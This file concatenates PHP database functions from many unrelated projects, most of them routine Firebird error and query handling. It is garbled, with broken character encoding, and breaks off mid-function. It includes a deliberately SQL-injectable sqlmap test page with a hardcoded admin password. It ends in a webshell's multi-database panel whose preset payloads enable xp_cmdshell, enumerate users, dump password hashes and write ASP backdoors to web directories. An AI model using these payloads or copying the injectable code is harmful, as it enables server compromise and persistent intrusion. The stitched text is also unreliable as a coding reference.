function updateError($location)
{
//$this->errorNumber = mysql_errno();
$this->errorMessage = ibase_errmsg();
$this->errorLocation = $location;
if ($this->errorNumber && $this->show_error_messages) {
echo '<br /><b>' . $this->errorLocation . '</b><br />' . $this->errorMessage;
flush();
}
}
function query($query, $unbuffered = false)
{
$result = ibase_query($query, $this->_link);
if (!$result) {
$this->errno = ibase_errcode();
$this->error = ibase_errmsg();
return false;
}
$this->error = "";
if ($result === true) {
$this->affected_rows = ibase_affected_rows($this->_link);
return true;
}
return new Min_Result($result);
}
/**
* This function initializes the class.
*
* @access public
* @override
* @param DB_Connection_Driver $connection the connection to be used
* @param string $sql the SQL statement to be queried
* @param integer $mode the execution mode to be used
* @throws Throwable_SQL_Exception indicates that the query failed
*/
public function __construct(DB_Connection_Driver $connection, $sql, $mode = NULL)
{
$this->resource = $connection->get_resource();
$command = @ibase_query($this->resource, $sql);
if ($command === FALSE) {
throw new Throwable_SQL_Exception('Message: Failed to query SQL statement. Reason: :reason', array(':reason' => @ibase_errmsg()));
}
$this->command = $command;
$this->record = FALSE;
$this->blobs = array();
$count = (int) @ibase_num_fields($command);
for ($i = 0; $i < $count; $i++) {
$field = ibase_field_info($command, $i);
if ($field['type'] == 'BLOB') {
$this->blobs[] = $field['name'];
}
}
}
function dbQuery($query, $show_errors = true, $all_results = true, $show_output = true)
{
if ($show_errors) {
error_reporting(E_ALL);
} else {
error_reporting(E_PARSE);
}
// Connect to the Firebird/Interbase Sybase database management system
$link = ibase_pconnect("/var/www/sqlmap/dbs/firebird/testdb.fdb", "SYSDBA", "testpass");
if (!$link) {
die(ibase_errmsg());
}
// Print results in HTML
print "<html><body>\n";
// Print SQL query to test sqlmap '--string' command line option
//print "<b>SQL query:</b> " . $query . "<br>\n";
// Perform SQL injection affected query
$result = ibase_query($link, $query);
if (!$result) {
if ($show_errors) {
print "<b>SQL error:</b> " . ibase_errmsg() . "<br>\n";
}
exit(1);
}
print "<b>SQL results:</b>\n";
print "<table border=\"1\">\n";
while ($line = ibase_fetch_assoc($result)) {
// This must stay here for Firebird
if (!$show_output) {
exit(1);
}
print "<tr>";
foreach ($line as $col_value) {
print "<td>" . $col_value . "</td>";
}
print "</tr>\n";
if (!$all_results) {
break;
}
}
print "</table>\n";
print "</body></html>";
}
public function execute($sql, array $data = null)
{
$this->connect();
if (!is_array($data)) {
$data = array();
}
$data = array_values($data);
foreach ($data as $i => $v) {
switch (gettype($v)) {
case 'boolean':
case 'integer':
$data[$i] = (int) $v;
break;
case 'array':
$data[$i] = implode(',', $v);
break;
case 'object':
$data[$i] = serialize($data[$i]);
break;
case 'resource':
if (is_resource($v) && get_resource_type($v) === 'stream') {
$data[$i] = stream_get_contents($data[$i]);
} else {
$data[$i] = serialize($data[$i]);
}
break;
}
}
array_unshift($data, $sql);
$temp = call_user_func_array("\\ibase_execute", $data);
if (!$temp) {
throw new DatabaseException('Could not execute query : ' . \ibase_errmsg() . ' <' . $sql . '>');
}
$this->aff = \ibase_affected_rows($this->lnk);
return $temp;
}
function _setDbError($query)
{
return $this->_setLastError(ibase_errcode(), ibase_errmsg(), $query);
}
/**
* Fetches the row at current position and moves the internal cursor to the next position.
* @param bool TRUE for associative array, FALSE for numeric
* @return array array on success, nonarray if no next record
*/
public function fetch($assoc)
{
DibiDriverException::tryError();
$result = $assoc ? ibase_fetch_assoc($this->resultSet, IBASE_TEXT) : ibase_fetch_row($this->resultSet, IBASE_TEXT);
// intentionally @
if (DibiDriverException::catchError($msg)) {
if (ibase_errcode() == self::ERROR_EXCEPTION_THROWN) {
preg_match('/exception (\\d+) (\\w+) (.*)/is', ibase_errmsg(), $match);
throw new DibiProcedureException($match[3], $match[1], $match[2], dibi::$sql);
} else {
throw new DibiDriverException($msg, ibase_errcode(), dibi::$sql);
}
}
return $result;
}
/**
+----------------------------------------------------------
* 数据库错误信息
* 并显示当前的SQL语句
+----------------------------------------------------------
* @access public
+----------------------------------------------------------
* @return string
+----------------------------------------------------------
* @throws ThinkExecption
+----------------------------------------------------------
*/
public function error()
{
$this->error = ibase_errmsg();
if ($this->debug && '' != $this->queryStr) {
$this->error .= "\n [ SQL语句 ] : " . $this->queryStr;
}
return $this->error;
}
/**
* Executes a prepared statement.
*
* @param array $params OPTIONAL Values to bind to parameter placeholders.
* @return bool
* @throws ZendX_Db_Statement_Firebird_Exception
*/
public function _execute(array $params = null)
{
if (!$this->_stmtPrepared) {
return false;
}
// if no params were given as an argument to execute(),
// then default to the _bindParam array
if ($params === null) {
$params = $this->_bindParam;
}
// send $params as input parameters to the statement
if ($params) {
array_unshift($params, $this->_stmtPrepared);
$retval = @call_user_func_array('ibase_execute', $params);
} else {
// execute the statement
$retval = @ibase_execute($this->_stmtPrepared);
}
$this->_stmtResult = $retval;
if ($retval === false) {
$last_error = ibase_errmsg();
$this->_stmtRowCount = 0;
}
//Firebird php ibase extension, auto-commit is not after each call, but at
//end of script. Disabled when transaction is active
if (!$this->_adapter->getTransaction()) {
ibase_commit_ret();
}
if ($retval === false) {
/**
* @see ZendX_Db_Statement_Firebird_Exception
*/
require_once 'ZendX/Db/Statement/Firebird/Exception.php';
throw new ZendX_Db_Statement_Firebird_Exception("Firebird statement execute error : " . $last_error);
}
// statements that have no result set do not return metadata
if (is_resource($this->_stmtResult)) {
// get the column names that will result
$this->_keys = array();
$coln = ibase_num_fields($this->_stmtResult);
$this->_stmtColumnCount = $coln;
for ($i = 0; $i < $coln; $i++) {
$col_info = ibase_field_info($this->_stmtResult, $i);
$this->_keys[] = $this->_adapter->foldCase($col_info['name']);
}
// set up a binding space for result variables
$this->_values = array_fill(0, count($this->_keys), null);
// set up references to the result binding space.
// just passing $this->_values in the call_user_func_array()
// below won't work, you need references.
$refs = array();
foreach ($this->_values as $i => &$f) {
$refs[$i] =& $f;
}
}
if ($trans = $this->_adapter->getTransaction()) {
$this->_stmtRowCount = ibase_affected_rows($trans);
} else {
$this->_stmtRowCount = ibase_affected_rows($this->_adapter->getConnection());
}
return true;
}
function _handleerror()
{
$this->_errorMsg = ibase_errmsg();
}
/**
*@package db_firebird
*@method query()
*@desc Send a Firebird/Interbase query
*@since v0.3.1
*@return bool & Populates $this->resource
* */
public function query($query)
{
$this->sql_query = $query;
if ($this->resource = ibase_query($query)) {
return TRUE;
} else {
// is hanled error
$error_no = ibase_errcode();
$is_handed = false;
if (array_key_exists($error_no, $this->arr_handled_errors)) {
$is_handed = true;
}
if ($is_handed == true) {
$this->error_code = $this->arr_handled_errors[$error_no];
return FALSE;
} else {
// if uknown error
try {
throw new FkException("Firebird/Interbase Error");
} catch (FkException $e) {
$e->description = 'Firebird/Interbase Respondió:' . ibase_errmsg() . '</b>';
$e->solution = 'Verifique la consulta';
$e->solution_code = fk_str_format($query, 'html');
$e->error_code = $error_no;
$e->show('code_help');
}
return FALSE;
}
}
// End else
}
/**
* Error
*
* Returns an array containing code and message of the last
* database error that has occured.
*
* @return array
*/
public function error()
{
return array('code' => ibase_errcode(), 'message' => ibase_errmsg());
}
function RollbackTransaction()
{
$this->Debug("Rollback Transaction");
if ($this->auto_commit) {
return $this->SetError("Rollback transaction", "transactions can not be rolled back when changes are auto commited");
}
if ($this->transaction_id && !ibase_rollback($this->transaction_id)) {
return $this->SetError("Rollback transaction", "Could not rollback a pending transaction: " . ibase_errmsg());
}
if (!($this->transaction_id = ibase_trans(IBASE_COMMITTED, $this->connection))) {
return $this->SetError("Rollback transaction", "Could start a new transaction: " . ibase_errmsg());
}
return 1;
}
/**
* Devuelve el error de Firebird
*
* @return string
*/
public function error($err = '')
{
if (!$this->id_connection) {
$this->last_error = ibase_errmsg() ? ibase_errmsg() : "[Error Desconocido en Firebird: {$err}]";
if ($this->logger) {
Logger::error($this->last_error);
}
return $this->last_error;
}
$this->last_error = ibase_errmsg() ? ibase_errmsg() : "[Error Desconocido en Firebird: {$err}]";
$this->last_error .= $err;
if ($this->logger) {
Logger::error($this->last_error);
}
return $this->last_error;
}
/**
* return sql error array
* @access private
*/
function _sql_error()
{
return array('message' => @ibase_errmsg(), 'code' => @function_exists('ibase_errcode') ? @ibase_errcode() : '');
}
/**
* Returns the number of rows affected by the execution of the
* last INSERT, DELETE, or UPDATE statement executed by this
* statement object.
*
* @return int The number of rows affected.
* @throws Zend_Db_Statement_Exception
*/
public function rowCount()
{
if ($trans = $this->_adapter->getTransaction()) {
$num_rows = ibase_affected_rows($trans);
} else {
$num_rows = ibase_affected_rows($this->_adapter->getConnection());
}
if ($num_rows === false) {
/**
* @see Zend_Db_Adapter_Firebird_Exception
*/
require_once 'Zend/Db/Statement/Frebird/Exception.php';
throw new Zend_Db_Statement_Firebird_Exception(ibase_errmsg());
}
return $num_rows;
}
/**
* Used to test whether we are able to connect to the database the user has specified
* and identify any problems (eg there are already tables with the names we want to use
* @param array $dbms should be of the format of an element of the array returned by {@link get_available_dbms get_available_dbms()}
* necessary extensions should be loaded already
*/
function connect_check_db($error_connect, &$error, $dbms_details, $table_prefix, $dbhost, $dbuser, $dbpasswd, $dbname, $dbport, $prefix_may_exist = false, $load_dbal = true, $unicode_check = true)
{
global $phpbb_root_path, $phpEx, $config, $lang;
$dbms = $dbms_details['DRIVER'];
if ($load_dbal) {
// Include the DB layer
include $phpbb_root_path . 'includes/db/' . $dbms . '.' . $phpEx;
}
// Instantiate it and set return on error true
$sql_db = 'dbal_' . $dbms;
$db = new $sql_db();
$db->sql_return_on_error(true);
// Check that we actually have a database name before going any further.....
if ($dbms_details['DRIVER'] != 'sqlite' && $dbms_details['DRIVER'] != 'oracle' && $dbname === '') {
$error[] = $lang['INST_ERR_DB_NO_NAME'];
return false;
}
// Make sure we don't have a daft user who thinks having the SQLite database in the forum directory is a good idea
if ($dbms_details['DRIVER'] == 'sqlite' && stripos(phpbb_realpath($dbhost), phpbb_realpath('../')) === 0) {
$error[] = $lang['INST_ERR_DB_FORUM_PATH'];
return false;
}
// Check the prefix length to ensure that index names are not too long and does not contain invalid characters
switch ($dbms_details['DRIVER']) {
case 'mysql':
case 'mysqli':
if (strspn($table_prefix, '-./\\') !== 0) {
$error[] = $lang['INST_ERR_PREFIX_INVALID'];
return false;
}
// no break;
// no break;
case 'postgres':
$prefix_length = 36;
break;
case 'mssql':
case 'mssql_odbc':
case 'mssqlnative':
$prefix_length = 90;
break;
case 'sqlite':
$prefix_length = 200;
break;
case 'firebird':
case 'oracle':
$prefix_length = 6;
break;
}
if (strlen($table_prefix) > $prefix_length) {
$error[] = sprintf($lang['INST_ERR_PREFIX_TOO_LONG'], $prefix_length);
return false;
}
// Try and connect ...
if (is_array($db->sql_connect($dbhost, $dbuser, $dbpasswd, $dbname, $dbport, false, true))) {
$db_error = $db->sql_error();
$error[] = $lang['INST_ERR_DB_CONNECT'] . '<br />' . ($db_error['message'] ? $db_error['message'] : $lang['INST_ERR_DB_NO_ERROR']);
} else {
// Likely matches for an existing phpBB installation
if (!$prefix_may_exist) {
$temp_prefix = strtolower($table_prefix);
$table_ary = array($temp_prefix . 'attachments', $temp_prefix . 'config', $temp_prefix . 'sessions', $temp_prefix . 'topics', $temp_prefix . 'users');
$tables = get_tables($db);
$tables = array_map('strtolower', $tables);
$table_intersect = array_intersect($tables, $table_ary);
if (sizeof($table_intersect)) {
$error[] = $lang['INST_ERR_PREFIX'];
}
}
// Make sure that the user has selected a sensible DBAL for the DBMS actually installed
switch ($dbms_details['DRIVER']) {
case 'mysqli':
if (version_compare(mysqli_get_server_info($db->db_connect_id), '4.1.3', '<')) {
$error[] = $lang['INST_ERR_DB_NO_MYSQLI'];
}
break;
case 'sqlite':
if (version_compare(sqlite_libversion(), '2.8.2', '<')) {
$error[] = $lang['INST_ERR_DB_NO_SQLITE'];
}
break;
case 'firebird':
// check the version of FB, use some hackery if we can't get access to the server info
if ($db->service_handle !== false && function_exists('ibase_server_info')) {
$val = @ibase_server_info($db->service_handle, IBASE_SVC_SERVER_VERSION);
preg_match('#V([\\d.]+)#', $val, $match);
if ($match[1] < 2) {
$error[] = $lang['INST_ERR_DB_NO_FIREBIRD'];
}
$db_info = @ibase_db_info($db->service_handle, $dbname, IBASE_STS_HDR_PAGES);
preg_match('/^\\s*Page size\\s*(\\d+)/m', $db_info, $regs);
$page_size = intval($regs[1]);
if ($page_size < 8192) {
$error[] = $lang['INST_ERR_DB_NO_FIREBIRD_PS'];
}
} else {
$sql = "SELECT *\n\t\t\t\t\t\tFROM RDB{$FUNCTIONS}\n\t\t\t\t\t\tWHERE RDB{$SYSTEM_FLAG} IS NULL\n\t\t\t\t\t\t\tAND RDB{$FUNCTION_NAME} = 'CHAR_LENGTH'";
$result = $db->sql_query($sql);
$row = $db->sql_fetchrow($result);
$db->sql_freeresult($result);
// if its a UDF, its too old
if ($row) {
$error[] = $lang['INST_ERR_DB_NO_FIREBIRD'];
} else {
$sql = 'SELECT 1 FROM RDB$DATABASE
WHERE BIN_AND(10, 1) = 0';
$result = $db->sql_query($sql);
if (!$result) {
$error[] = $lang['INST_ERR_DB_NO_FIREBIRD'];
}
$db->sql_freeresult($result);
}
// Setup the stuff for our random table
$char_array = array_merge(range('A', 'Z'), range('0', '9'));
$char_len = mt_rand(7, 9);
$char_array_len = sizeof($char_array) - 1;
$final = '';
for ($i = 0; $i < $char_len; $i++) {
$final .= $char_array[mt_rand(0, $char_array_len)];
}
// Create some random table
$sql = 'CREATE TABLE ' . $final . " (\n\t\t\t\t\t\tFIELD1 VARCHAR(255) CHARACTER SET UTF8 DEFAULT '' NOT NULL COLLATE UNICODE,\n\t\t\t\t\t\tFIELD2 INTEGER DEFAULT 0 NOT NULL);";
$db->sql_query($sql);
// Create an index that should fail if the page size is less than 8192
$sql = 'CREATE INDEX ' . $final . ' ON ' . $final . '(FIELD1, FIELD2);';
$db->sql_query($sql);
if (ibase_errmsg() !== false) {
$error[] = $lang['INST_ERR_DB_NO_FIREBIRD_PS'];
} else {
// Kill the old table
$db->sql_query('DROP TABLE ' . $final . ';');
}
unset($final);
}
break;
case 'oracle':
if ($unicode_check) {
$sql = "SELECT *\n\t\t\t\t\t\tFROM NLS_DATABASE_PARAMETERS\n\t\t\t\t\t\tWHERE PARAMETER = 'NLS_RDBMS_VERSION'\n\t\t\t\t\t\t\tOR PARAMETER = 'NLS_CHARACTERSET'";
$result = $db->sql_query($sql);
while ($row = $db->sql_fetchrow($result)) {
$stats[$row['parameter']] = $row['value'];
}
$db->sql_freeresult($result);
if (version_compare($stats['NLS_RDBMS_VERSION'], '9.2', '<') && $stats['NLS_CHARACTERSET'] !== 'UTF8') {
$error[] = $lang['INST_ERR_DB_NO_ORACLE'];
}
}
break;
case 'postgres':
if ($unicode_check) {
$sql = "SHOW server_encoding;";
$result = $db->sql_query($sql);
$row = $db->sql_fetchrow($result);
$db->sql_freeresult($result);
if ($row['server_encoding'] !== 'UNICODE' && $row['server_encoding'] !== 'UTF8') {
$error[] = $lang['INST_ERR_DB_NO_POSTGRES'];
}
}
break;
}
}
if ($error_connect && (!isset($error) || !sizeof($error))) {
return true;
}
return false;
}
function GetSequenceCurrentValue(&$db, $name, &$value)
{
if (($result = $db->Query("SELECT GEN_ID({$name},0) as the_value FROM RDB\$DATABASE ")) == 0) {
return $db->SetError("Get sequence current value", ibase_errmsg());
}
$value = intval($db->FetchResult($result, 0, 0));
$db->FreeResult($result);
return 1;
}
/**
* 数据库错误信息
* 并显示当前的SQL语句
* @access public
* @return string
*/
public function error()
{
$this->error = ibase_errmsg();
if ('' != $this->queryStr) {
$this->error .= "\n [ SQL语句 ] : " . $this->queryStr;
}
trace($this->error, '', 'ERR');
return $this->error;
}
public function execute($sql, $data = array())
{
if (!$this->is_connected()) {
$this->connect();
}
if (!is_array($data)) {
$data = array();
}
$data = array_values($data);
foreach ($data as $i => $v) {
switch (gettype($v)) {
case "boolean":
case "integer":
$data[$i] = (int) $v;
break;
case "array":
$data[$i] = implode(',', $v);
break;
case "object":
case "resource":
$data[$i] = serialize($data[$i]);
break;
}
}
array_unshift($data, $sql);
$temp = call_user_func_array("ibase_execute", $data);
if (!$temp) {
throw new Exception('Could not execute query : ' . ibase_errmsg() . ' <' . $sql . '>');
}
$this->aff = ibase_affected_rows($this->lnk);
return $temp;
}
/**
* Execute any statement
*
* @param string sql
* @param bool buffered default TRUE
* @return rdbms.ResultSet
* @throws rdbms.SQLException
*/
protected function query0($sql, $buffered = true)
{
if (!is_resource($this->handle)) {
if (!($this->flags & DB_AUTOCONNECT)) {
throw new \rdbms\SQLStateException('Not connected');
}
$c = $this->connect();
// Check for subsequent connection errors
if (false === $c) {
throw new \rdbms\SQLStateException('Previously failed to connect');
}
}
$result = ibase_query($sql, $this->handle);
if (false === $result) {
$message = 'Statement failed: ' . trim(ibase_errmsg()) . ' @ ' . $this->dsn->getHost();
$code = ibase_errcode();
switch ($code) {
case -924:
// Connection lost
throw new \rdbms\SQLConnectionClosedException($message, $sql);
case -913:
// Deadlock
throw new \rdbms\SQLDeadlockException($message, $sql, $code);
default:
// Other error
throw new \rdbms\SQLStatementFailedException($message, $sql, $code);
}
} else {
if (true === $result) {
return new QuerySucceeded(ibase_affected_rows($this->handle));
} else {
return new InterBaseResultSet($result, $this->tz);
}
}
}
function otherdb()
{
$db = isset($_GET['db']) ? $_GET['db'] : 'ms';
print <<<END
<form method="POST" name="dbform" id="dbform" action="?s=gg&db={$db}" enctype="multipart/form-data">
<div class="actall">
<a href="?s=gg&db=ms">   MSSQL  </a>
<a href="?s=gg&db=ora">   Oracle  </a>
<a href="?s=gg&db=ifx">   InforMix  </a>
<a href="?s=gg&db=fb">   FireBird  </a>
<a href="?s=gg&db=db2">  DB2  </a></div></form>
END;
if ($db == "ms") {
$mshost = isset($_POST['mshost']) ? $_POST['mshost'] : 'localhost';
$msuser = isset($_POST['msuser']) ? $_POST['msuser'] : '******';
$mspass = isset($_POST['mspass']) ? $_POST['mspass'] : '';
$msdbname = isset($_POST['msdbname']) ? $_POST['msdbname'] : 'master';
$msaction = isset($_POST['action']) ? $_POST['action'] : '';
$msquery = isset($_POST['mssql']) ? $_POST['mssql'] : '';
$msquery = stripslashes($msquery);
print <<<END
<div class="actall">
<form method="POST" name="msform" action="?s=gg&db=ms">
Host:<input type="text" name="mshost" value="{$mshost}" style="width:100px">
User:<input type="text" name="msuser" value="{$msuser}" style="width:100px">
Pass:<input type="text" name="mspass" value="{$mspass}" style="width:100px">
Dbname:<input type="text" name="msdbname" value="{$msdbname}" style="width:100px"><br>
<script language="javascript">
function msFull(i){
\tStr = new Array(11);
\tStr[0] = "";
\tStr[1] = "select @@version;";
\tStr[2] = "select name from sysdatabases;";
\tStr[3] = "select name from sysobject where type='U';";
\tStr[4] = "select name from syscolumns where id=Object_Id('table_name');";
\tStr[5] = "Use master dbcc addextendedproc ('sp_OACreate','odsole70.dll');";
\tStr[6] = "Use master dbcc addextendedproc ('xp_cmdshell','xplog70.dll');";
\tStr[7] = "EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;";
\tStr[8] = "exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;";
\tStr[9] = "exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;";
\tStr[10] = "Exec master.dbo.xp_cmdshell 'net user';";
\tStr[11] = "Declare @s int;exec sp_oacreate 'wscript.shell',@s out;Exec SP_OAMethod @s,'run',NULL,'cmd.exe /c echo ^<%execute(request(char(35)))%^> > c:\\\\1.asp';";
\tStr[12] = "sp_makewebtask @outputfile='d:\\\\web\\\\bin.asp',@charset=gb2312,@query='select ''<%execute(request(chr(35)))%>''' ";
\tmsform.mssql.value = Str[i];
\treturn true;
}
</script>
<textarea name="mssql" style="width:600px;height:200px;">{$msquery}</textarea><br>
<select onchange="return msFull(options[selectedIndex].value)">
\t<option value="0" selected>ִ������</option>
\t<option value="1">��ʾ�汾</option>
\t<option value="2">���ݿ�</option>
\t<option value="3">����</option>
\t<option value="4">�ֶ�</option>
\t<option value="5">sp_oacreate</option>
\t<option value="6">xp_cmdshell</option>
\t<option value="7">xp_cmdshell(2005)</option>
\t<option value="8">sp_oacreate(2005)</option>
\t<option value="9">����openrowset(2005)</option>
\t<option value="10">xp_cmdshell exec</option>
\t<option value="10">sp_oamethod exec</option>
\t<option value="11">sp_makewebtask</option>
</select>
<input type="hidden" name="action" value="msquery">
<input class="bt" type="submit" value="Query"></form></div>
END;
if ($msaction == 'msquery') {
$msconn = mssql_connect($mshost, $msuser, $mspass);
mssql_select_db($msdbname, $msconn) or die("connect error :" . mssql_get_last_message());
$msresult = mssql_query($msquery) or die(mssql_get_last_message());
echo '<font face="verdana"><table border="1" cellpadding="1" cellspacing="2">' . "\n<tr>\n";
for ($i = 0; $i < mssql_num_fields($msresult); $i++) {
echo '<td><b>' . mssql_field_name($msresult, $i) . "</b></td>\n";
}
echo "</tr>\n";
mssql_data_seek($result, 0);
while ($msrow = mssql_fetch_row($msresult)) {
echo "<tr>\n";
for ($i = 0; $i < mssql_num_fields($msresult); $i++) {
echo '<td>' . "{$msrow[$i]}" . '</td>';
}
echo "</tr>\n";
}
echo "</table></font>";
mssql_free_result($msresult);
mssql_close();
}
} elseif ($db == "ora") {
$orahost = isset($_POST['orahost']) ? $_POST['orahost'] : 'localhost';
$oraport = isset($_POST['oraport']) ? $_POST['oraport'] : '1521';
$orauser = isset($_POST['orauser']) ? $_POST['orauser'] : '******';
$orapass = isset($_POST['orapass']) ? $_POST['orapass'] : '******';
$orasid = isset($_POST['orasid']) ? $_POST['orasid'] : 'ORCL';
$oraaction = isset($_POST['action']) ? $_POST['action'] : '';
$oraquery = isset($_POST['orasql']) ? $_POST['orasql'] : '';
$oraquery = stripslashes($oraquery);
print <<<END
<form method="POST" name="oraform" action="?s=gg&db=ora">
<div class="actall">
Host:<input type="text" name="orahost" value="{$orahost}" style="width:100px">
Port:<input type="text" name="oraport" value="{$oraport}" style="width:50px">
User:<input type="text" name="orauser" value="{$orauser}" style="width:80px">
Pass:<input type="text" name="orapass" value="{$orapass}" style="width:100px">
SID:<input type="text" name="orasid" value="{$orasid}" style="width:50px"><br>
<script language="javascript">
function oraFull(i){
Str = new Array(5);
\tStr[0] = "";
\tStr[1] = "select version();";
\tStr[2] = "SELECT NAME FROM V{$DATABASE}";
\tStr[3] = "select * From all_objects where object_type='TABLE'";
\tStr[4] = "select column_name from user_tab_columns where table_name='table1'";
\toraform.orasql.value = Str[i];
\treturn true;
}
</script>
<textarea name="orasql" style="width:600px;height:200px;">{$oraquery}</textarea><br>
<select onchange="return oraFull(options[selectedIndex].value)">
\t<option value="0" selected>ִ������</option>
\t<option value="1">��ʾ�汾</option>
\t<option value="2">���ݿ�</option>
\t<option value="3">����</option>
\t<option value="4">�ֶ�</option>
</select>
<input type="hidden" name="action" value="myquery">
<input class="bt" type="submit" value="Query"></div></form>
END;
if ($oraaction == 'oraquery') {
$oralink = OCILogon($orauser, $orapass, "(DEscriptION=(ADDRESS=(PROTOCOL =TCP)(HOST={$orahost})(PORT = {$oraport}))(CONNECT_DATA =(SID={$orasid})))") or die(ocierror());
$oraresult = ociparse($oralink, $oraquery) or die(ocierror());
$orarow = oci_fetch_row($oraresult);
echo '<font face="verdana"><table border="1" cellpadding="1" cellspacing="2">' . "\n<tr>\n";
for ($i = 0; $i < oci_num_fields($oraresult); $i++) {
echo '<td><b>' . oci_field_name($oraresult, $i) . "</b></td>\n";
}
echo "</tr>\n";
ociresult($oraresult, 0);
while ($orarow = ora_fetch_row($oraresult)) {
echo "<tr>\n";
for ($i = 0; $i < ora_num_fields($result); $i++) {
echo '<td>' . "{$orarow[$i]}" . '</td>';
}
echo "</tr>\n";
}
echo "</table></font>";
oci_free_statement($oraresult);
ocilogoff();
}
} elseif ($db == "ifx") {
$ifxuser = isset($_POST['ifxuser']) ? $_POST['ifxuser'] : '******';
$ifxpass = isset($_POST['ifxpass']) ? $_POST['ifxpass'] : '******';
$ifxdbname = isset($_POST['ifxdbname']) ? $_POST['ifxdbname'] : 'ifxdb';
$ifxaction = isset($_POST['action']) ? $_POST['action'] : '';
$ifxquery = isset($_POST['ifxsql']) ? $_POST['ifxsql'] : '';
$ifxquery = stripslashes($ifxquery);
print <<<END
<form method="POST" name="ifxform" action="?s=gg&db=ifx">
<div class="actall">Dbname:<input type="text" name="ifxhost" value="{$ifxdbname}" style="width:100px">
User:<input type="text" name="ifxuser" value="{$ifxuser}" style="width:100px">
Pass:<input type="text" name="ifxpass" value="{$ifxpass}" style="width:100px"><br>
<script language="javascript">
function ifxFull(i){
Str = new Array(11);
\tStr[0] = "";
\tStr[1] = "select dbservername from sysobjects;";
\tStr[2] = "select name from sysdatabases;";
\tStr[3] = "select tabname from systables;";
\tStr[4] = "select colname from syscolumns where tabid=n;";
\tStr[5] = "select username,usertype,password from sysusers;";
\tifxform.ifxsql.value = Str[i];
\treturn true;
}
</script>
<textarea name="ifxsql" style="width:600px;height:200px;">{$ifxquery}</textarea><br>
<select onchange="return ifxFull(options[selectedIndex].value)">
\t<option value="0" selected>ִ������</option>
\t<option value="1">���ݿ�����������</option>
\t<option value="1">���ݿ�</option>
\t<option value="2">����</option>
\t<option value="3">�ֶ�</option>
\t<option value="4">hashes</option>
</select>
<input type="hidden" name="action" value="ifxquery">
<input class="bt" type="submit" value="Query"></div></form>
END;
if ($ifxaction == 'ifxquery') {
$ifxlink = ifx_connect($ifcdbname, $ifxuser, $ifxpass) or die(ifx_errormsg());
$ifxresult = ifx_query($ifxquery, $ifxlink) or die(ifx_errormsg());
$ifxrow = ifx_fetch_row($ifxresult);
echo '<font face="verdana"><table border="1" cellpadding="1" cellspacing="2">' . "\n<tr>\n";
for ($i = 0; $i < ifx_num_fields($ifxresult); $i++) {
echo '<td><b>' . ifx_fieldproperties($ifxresult) . "</b></td>\n";
}
echo "</tr>\n";
mysql_data_seek($ifxresult, 0);
while ($ifxrow = ifx_fetch_row($ifxresult)) {
echo "<tr>\n";
for ($i = 0; $i < ifx_num_fields($ifxresult); $i++) {
echo '<td>' . "{$ifxrow[$i]}" . '</td>';
}
echo "</tr>\n";
}
echo "</table></font>";
ifx_free_result($ifxresult);
ifx_close();
}
} elseif ($db == "db2") {
$db2host = isset($_POST['db2host']) ? $_POST['db2host'] : 'localhost';
$db2port = isset($_POST['db2port']) ? $_POST['db2port'] : '50000';
$db2user = isset($_POST['db2user']) ? $_POST['db2user'] : '******';
$db2pass = isset($_POST['db2pass']) ? $_POST['db2pass'] : '******';
$db2dbname = isset($_POST['db2dbname']) ? $_POST['db2dbname'] : 'mysql';
$db2action = isset($_POST['action']) ? $_POST['action'] : '';
$db2query = isset($_POST['db2sql']) ? $_POST['db2sql'] : '';
$db2query = stripslashes($db2query);
print <<<END
<form method="POST" name="db2form" action="?s=gg&db=db2">
<div class="actall">Host:<input type="text" name="db2host" value="{$db2host}" style="width:100px">
Port:<input type="text" name="db2port" value="{$db2port}" style="width:60px">
User:<input type="text" name="db2user" value="{$db2user}" style="width:100px">
Pass:<input type="text" name="db2pass" value="{$db2pass}" style="width:100px">
Dbname:<input type="text" name="db2dbname" value="{$db2dbname}" style="width:100px"><br>
<script language="javascript">
function db2Full(i){
Str = new Array(4);
\tStr[0] = "";
\tStr[1] = "select schemaname from syscat.schemata;";
\tStr[2] = "select name from sysibm.systables;";
\tStr[3] = "select colname from syscat.columns where tabname='table_name';";
\tStr[4] = "db2 get db cfg for db_name;";
db2form.db2sql.value = Str[i];
return true;
}
</script>
<textarea name="db2sql" style="width:600px;height:200px;">{$db2query}</textarea><br>
<select onchange="return db2Full(options[selectedIndex].value)">
\t<option value="0" selected>ִ������</option>
\t<option value="1">���ݿ�</option>
\t<option value="1">����</option>
\t<option value="2">�ֶ�</option>
\t<option value="3">���ݿ�����</option>
</select>
<input type="hidden" name="action" value="db2query">
<input class="bt" type="submit" value="Query"></div></form>
END;
if ($myaction == 'db2query') {
$db2link = db2_connect($db2dbname, $db2user, $db2pass) or die(db2_conn_errormsg());
$db2result = db2_exec($db2link, $db2query) or die(db2_stmt_errormsg());
$db2row = db2_fetch_row($db2result);
echo '<font face="verdana"><table border="1" cellpadding="1" cellspacing="2">' . "\n<tr>\n";
for ($i = 0; $i < db2_num_fields($db2result); $i++) {
echo '<td><b>' . db2_field_name($db2result) . "</b></td>\n";
}
echo "</tr>\n";
while ($db2row = db2_fetch_row($db2result)) {
echo "<tr>\n";
for ($i = 0; $i < db2_num_fields($db2result); $i++) {
echo '<td>' . "{$db2row[$i]}" . '</td>';
}
echo "</tr>\n";
}
echo "</table></font>";
db2_free_result($db2result);
db2_close();
}
} elseif ($db == "fb") {
$fbhost = isset($_POST['fbhost']) ? $_POST['fbhost'] : 'localhost';
$fbpath = isset($_POST['fbpath']) ? $_POST['fbpath'] : '';
$fbpath = str_replace("\\\\", "\\", $fbpath);
$fbuser = isset($_POST['fbuser']) ? $_POST['fbuser'] : '******';
$fbpass = isset($_POST['fbpass']) ? $_POST['fbpass'] : '******';
$fbaction = isset($_POST['action']) ? $_POST['action'] : '';
$fbquery = isset($_POST['fbsql']) ? $_POST['fbsql'] : '';
$fbquery = stripslashes($fbquery);
print <<<END
<form method="POST" name="fbform" action="?s=gg&db=fb">
<div class="actall">Host:<input type="text" name="fbhost" value="{$fbhost}" style="width:100px">
Path:<input type="text" name="fbpath" value="{$fbpath}" style="width:100px">
User:<input type="text" name="fbuser" value="{$fbuser}" style="width:100px">
Pass:<input type="text" name="fbpass" value="{$fbpass}" style="width:100px"><br/>
<script language="javascript">
function fbFull(i){
Str = new Array(5);
\tStr[0] = "";
